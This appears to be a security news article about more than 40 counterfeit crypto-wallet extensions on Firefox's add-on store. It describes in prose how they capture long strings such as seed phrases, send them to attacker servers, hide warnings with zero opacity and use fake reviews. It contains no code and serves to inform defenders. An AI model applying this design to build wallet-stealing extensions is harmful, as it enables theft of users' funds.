Cybersecurity researchers from Koi Security have uncovered a sophisticated cryptocurrency theft operation targeting Firefox users through over 40 malicious browser extensions distributed via Mozilla’s official add-on store. The campaign demonstrates advanced social engineering techniques, with attackers creating convincing replicas of popular cryptocurrency wallet extensions to steal users’ digital assets and private keys.
Sophisticated Impersonation of Leading Crypto Wallets
The threat actors displayed remarkable attention to detail in their deception strategy, creating fraudulent versions of extensions for industry-leading cryptocurrency wallets. The compromised brands include Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, and MyMonero – collectively representing millions of legitimate users worldwide.
What makes this campaign particularly dangerous is the attackers’ use of open-source code from legitimate wallet applications as the foundation for their malicious clones. This technique allowed cybercriminals to create nearly identical replicas of trusted extensions while embedding hidden malicious functionality that operates beneath the surface.
Technical Analysis of the Malware Mechanism
The technical implementation reveals a high level of sophistication in the attack methodology. The malicious extensions deploy specialized input and click event handlers that continuously monitor user interactions with web pages, specifically targeting sensitive cryptocurrency-related data entry.
The malware’s algorithm focuses on analyzing text strings longer than 30 characters, a threshold designed to capture private keys and seed phrases commonly used in cryptocurrency transactions. Once these critical data elements are identified, the malware immediately transmits them to command-and-control servers operated by the threat actors.
To avoid detection, the developers implemented an advanced stealth technique by setting all error dialogs and security warnings to zero opacity (opacity: 0). This rendering technique makes all warning messages completely invisible to users, preventing them from recognizing suspicious activity or potential security breaches.
Campaign Timeline and Scale of Operations
Security analysis indicates this malicious campaign has been active since April 2025, with threat actors continuously uploading new fraudulent extensions to maintain their operation. The most recent malicious samples were discovered just last week, demonstrating the ongoing and persistent nature of this threat.
The attackers employ multiple social engineering tactics to build user trust and encourage installations. Beyond replicating official brand logos and interface designs, many extensions feature hundreds of fabricated positive reviews, often exceeding the actual number of installations – a clear indicator of manipulation.
Mozilla’s Response and Enhanced Security Measures
Following notification from Koi Security researchers, Mozilla has implemented emergency response protocols to address the threat. Company representatives confirmed awareness of the security incident and initiated immediate removal procedures for identified malicious extensions.
Coincidentally, Mozilla recently introduced an enhanced early detection system specifically designed to identify cryptocurrency-related fraudulent add-ons. This new system creates risk profiles for each wallet extension and automatically alerts security moderators when suspicious patterns reach predetermined threat thresholds.
This incident underscores the critical importance of exercising extreme caution when installing browser extensions, particularly those handling cryptocurrency assets. Users should exclusively download extensions from official sources, thoroughly examine user reviews for authenticity, and verify developer credentials before installing any add-ons related to digital asset management. Additionally, implementing multi-factor authentication and regularly auditing installed extensions can significantly reduce exposure to similar threats.
